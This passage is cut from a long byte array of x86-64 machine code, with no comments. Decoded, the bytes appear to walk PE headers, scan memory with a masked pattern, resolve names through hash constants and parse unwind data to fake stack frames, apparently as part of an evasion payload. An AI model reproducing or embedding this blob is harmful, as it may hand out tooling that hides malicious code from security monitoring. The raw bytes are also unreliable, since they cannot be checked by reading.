48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x58,0xD9,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x08,0x02,0x00,0x00,0x48,0x8B,0x45,0x28,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0xE3,0xDB,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x3A,0x48,0x8B,0x45,0x20,0x8B,0x55,0xFC,0x48,0x63,0xD2,0x48,0x81,0xC2,0x00,0x01,0x00,0x00,0x0F,0xB7,0x44,0x50,0x08,0x66,0x83,0xF8,0x2E,0x75,0x1A,0x48,0x8B,0x45,0x20,0x8B,0x55,0xFC,0x48,0x63,0xD2,0x48,0x81,0xC2,0x00,0x01,0x00,0x00,0x66,0xC7,0x44,0x50,0x08,0x00,0x00,0xEB,0x0D,0x83,0x45,0xFC,0x01,0x81,0x7D,0xFC,0x03,0x01,0x00,0x00,0x7E,0xBD,0x48,0x8B,0x45,0x20,0x8B,0x55,0x30,0x89,0x90,0x10,0x04,0x00,0x00,0x48,0x83,0x7D,0x38,0x00,0x74,0x1D,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x14,0x04,0x00,0x00,0x48,0x8B,0x45,0x38,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC2,0xE8,0x36,0xDB,0x00,0x00,0x48,0x8B,0x45,0x20,0x8B,0x55,0x50,0x89,0x90,0x18,0x05,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x1C,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x20,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0xC7,0x80,0x28,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x30,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x34,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x38,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x40,0x00,0x74,0x55,0x48,0x83,0x7D,0x48,0x00,0x74,0x4E,0x48,0x8B,0x45,0x40,0xBA,0xFF,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0D,0xD8,0x00,0x00,0x89,0x45,0xF8,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x40,0x05,0x00,0x00,0x48,0x8B,0x45,0x40,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x55,0xDA,0x00,0x00,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x40,0x06,0x00,0x00,0x48,0x8B,0x45,0x48,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x38,0xDA,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x40,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x54,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x58,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xEB,0x33,0x48,0x8B,0x45,0x20,0x0F,0xB6,0x00,0x3C,0x78,0x75,0x19,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x10,0x48,0x8B,0x45,0x18,0x0F,0xB6,0x00,0x38,0xC2,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x83,0x45,0x20,0x01,0x48,0x83,0x45,0x10,0x01,0x48,0x83,0x45,0x18,0x01,0x48,0x8B,0x45,0x20,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC2,0xB8,0x01,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x3F,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0xF0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x5C,0xFF,0xFF,0xFF,0x85,0xC0,0x74,0x12,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x11,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x18,0x72,0xB9,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x07,0x00,0x00,0x00,0x48,0x8D,0x15,0xE2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xDA,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x96,0xF8,0x00,0x00,0x41,0xB8,0x26,0xD4,0x95,0xF4,0x48,0x8D,0x15,0x9F,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0xFC,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x09,0x00,0x00,0x00,0x48,0x8D,0x15,0xC3,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xC2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x7D,0xF8,0x00,0x00,0x41,0xB8,0xBC,0x8F,0x3E,0xA6,0x48,0x8D,0x15,0x84,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1D,0xFC,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x06,0x00,0x00,0x00,0x48,0x8D,0x15,0xAC,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xA2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x6C,0xF8,0x00,0x00,0x41,0xB8,0x87,0x5A,0x1C,0x55,0x48,0x8D,0x15,0x73,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC8,0xFB,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x8B,0x55,0xFC,0x89,0x10,0x90,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x09,0x00,0x00,0x00,0x48,0x8D,0x15,0xF2,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xF1,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0xAC,0xF7,0x00,0x00,0x41,0xB8,0xBC,0x8F,0x3E,0xA6,0x48,0x8D,0x15,0xB3,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4C,0xFB,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x06,0x00,0x00,0x00,0x48,0x8D,0x15,0xDB,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xD1,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x9B,0xF7,0x00,0x00,0x41,0xB8,0x87,0x5A,0x1C,0x55,0x48,0x8D,0x15,0xA2,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF7,0xFA,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x8B,0x55,0xFC,0x89,0x10,0x90,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x18,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x14,0x0F,0xB7,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE0,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x93,0x00,0x00,0x00,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x04,0xF7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC0,0xD6,0x00,0x00,0x85,0xC0,0x75,0x5E,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x8B,0x40,0x0C,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x01,0xD0,0x8B,0x50,0x10,0x48,0x8B,0x45,0x20,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x18,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x39,0x45,0xF8,0x0F,0x82,0x59,0xFF,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE9,0x4A,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x3C,0x02,0x00,0x00,0x48,0x8D,0x4D,0xCC,0x48,0x8D,0x55,0xD0,0x48,0x8B,0x45,0xE0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x58,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x1B,0x02,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x75,0x12,0x48,0x8B,0x45,0x10,0x8B,0x80,0x10,0x04,0x00,0x00,0x85,0xC0,0x0F,0x84,0x84,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x74,0x2C,0x48,0x8B,0x45,0x10,0x48,0x05,0x14,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0C,0x7F,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0x48,0x00,0x00,0x48,0x89,0x45,0xF0,0xEB,0x20,0x48,0x8B,0x45,0x10,0x8B,0x90,0x10,0x04,0x00,0x00,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0x48,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x88,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x90,0x48,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x80,0x40,0x05,0x00,0x00,0x84,0xC0,0x74,0x79,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x8B,0x45,0xCC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xDC,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x88,0x40,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x80,0x40,0x06,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x8B,0x55,0xDC,0x48,0x8D,0x4D,0xC0,0x48,0x89,0x4C,0x24,0x20,0x48,0x89,0xC1,0xE8,0xBA,0xFA,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xF4,0x00,0x00,0x00,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x85,0xC0,0x74,0x66,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x8B,0x45,0xCC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xDC,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x39,0x45,0xDC,0x0F,0x82,0x9F,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x80,0x18,0x05,0x00,0x00,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x89,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x48,0x07,0x00,0x00,0x48,0x85,0xC0,0x74,0x30,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x48,0x07,0x00,0x00,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x89,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x50,0x07,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x48,0x29,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x50,0x07,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0x48,0xB8,0x01,0x02,0x01,0x01,0x02,0x03,0x01,0x00,0x48,0x89,0x45,0xC4,0xC7,0x45,0xCC,0x02,0x03,0x01,0x01,0x48,0x8B,0x45,0xC4,0x48,0x89,0x45,0xD0,0x8B,0x45,0xCC,0x89,0x45,0xD8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x28,0x8B,0x40,0x08,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x89,0xC1,0x48,0x8B,0x45,0x28,0x8B,0x00,0x48,0x8B,0x55,0x30,0x01,0xC2,0x89,0xC8,0x29,0xD0,0x89,0x45,0xDC,0xE9,0xF0,0x01,0x00,0x00,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x05,0x83,0xE0,0x0F,0x0F,0xB6,0xC0,0x89,0x45,0xE4,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x05,0xC0,0xE8,0x04,0x0F,0xB6,0xC0,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB6,0x44,0x50,0x04,0x0F,0xB6,0xC0,0x39,0x45,0xDC,0x0F,0x82,0x90,0x01,0x00,0x00,0x83,0x7D,0xE4,0x00,0x75,0x5B,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0x08,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0x83,0x7D,0xE0,0x05,0x0F,0x85,0x63,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x80,0x30,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x90,0x34,0x05,0x00,0x00,0x8B,0x45,0xF8,0x83,0xC0,0x01,0x89,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x38,0x05,0x00,0x00,0xE9,0x29,0x01,0x00,0x00,0x83,0x7D,0xE4,0x04,0x75,0x09,0x83,0x45,0xF8,0x01,0xE9,0x1A,0x01,0x00,0x00,0x83,0x7D,0xE4,0x05,0x75,0x09,0x83,0x45,0xF8,0x02,0xE9,0x0B,0x01,0x00,0x00,0x83,0x7D,0xE4,0x02,0x75,0x24,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8B,0x55,0xE0,0x83,0xC2,0x01,0xC1,0xE2,0x03,0x01,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xE9,0xE1,0x00,0x00,0x00,0x83,0x7D,0xE4,0x01,0x75,0x59,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB7,0x44,0x50,0x04,0x0F,0xB7,0xC0,0x89,0x45,0xF4,0x83,0x7D,0xE0,0x00,0x75,0x06,0xC1,0x65,0xF4,0x03,0xEB,0x19,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xF8,0x0F,0xB7,0x44,0x50,0x04,0x0F,0xB7,0xC0,0xC1,0xE0,0x10,0x01,0x45,0xF4,0x48,0x8B,0x45,0x10,0x8B,0x90,0x1C,0x05,0x00,0x00,0x8B,0x45,0xF4,0x01,0xC2,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xE9,0x82,0x00,0x00,0x00,0x83,0x7D,0xE4,0x03,0x75,0x2D,0x48,0x8B,0x45,0x10,0xC7,0x80,0x20,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x75,0x68,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0xF0,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xEB,0x4F,0x83,0x7D,0xE4,0x06,0x74,0x49,0x83,0x7D,0xE4,0x08,0x75,0x06,0x83,0x45,0xF8,0x01,0xEB,0x3D,0x83,0x7D,0xE4,0x09,0x75,0x06,0x83,0x45,0xF8,0x02,0xEB,0x31,0x83,0x7D,0xE4,0x0A,0x75,0x24,0x48,0x8B,0x45,0x10,0xC7,0x80,0x54,0x07,0x00,0x00,0x01,0x00,0x00,0x00,0x83,0x7D,0xE0,0x00,0x0F,0x95,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x90,0x58,0x07,0x00,0x00,0xEB,0x3F,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x45,0xF8,0x01,0xEB,0x1E,0x8B,0x45,0xE4,0x0F,0xB6,0x44,0x05,0xD0,0x0F,0xB6,0xC0,0x01,0x45,0xF8,0x83,0x7D,0xE4,0x01,0x75,0x0A,0x83,0x7D,0xE0,0x00,0x74,0x04,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xC0,0x39,0x45,0xF8,0x0F,0x82,0xFC,0xFD,0xFF,0xFF,0x83,0x7D,0xF0,0x00,0x74,0x7E,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x00,0xC0,0xE8,0x03,0x0F,0xB6,0xC0,0x83,0xE0,0x04,0x85,0xC0,0x74,0x32,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x40,0x02,0x0F,0xB6,0xC0,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x83,0xE0,0x01,0x85,0xC0,0x74,0x04,0x83,0x45,0xF8,0x01,0x8B,0x45,0xF8,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x48,0x01,0xD0,0x48,0x83,0xC0,0x04,0x48,0x89,0x45,0x28,0x48,0x8B,0x45,0xE8,0x0F,0xB6,0x00,0xC0,0xE8,0x03,0x0F,0xB6,0xC0,0x83,0xE0,0x04,0x85,0xC0,0x0F,0x85,0x3C,0xFD,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x80,0x1C,0x05,0x00,0x00,0x8D,0x50,0x08,0x48,0x8B,0x45,0x10,0x89,0x90,0x1C,0x05,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x89,0xC1,0x48,0x8D,0x55,0xE8,0x48,0x8D,0x45,0xF0,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x74,0x05,0x00,0x00,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x32,0x48,0x8B,0x4D,0xE8,0x4C,0x8B,0x4D,0xF0,0x44,0x8B,0x45,0x20,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x4C,0x24,0x20,0x48,0x89,0xC1,0xE8,0x21,0xFC,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x6E,0x8B,0x45,0xFC,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0xC7,0x80,0x40,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xF2,0xF8,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x2E,0x8B,0x4D,0x18,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xEF,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x13,0x48,0x8B,0x45,0xF0,0xC7,0x80,0x40,0x07,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x18,0x72,0x8A,0x90,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0x18,0x48,0x89,0x10,0x90,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x68,0x48,0x8D,0x6C,0x24,0x60,0x48,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0xC7,0x40,0x38,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x81,0xFF,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE9,0x0F,0x03,0x00,0x00,0x8B,0x45,0x28,0x2B,0x45,0xF0,0x83,0xE8,0x01,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0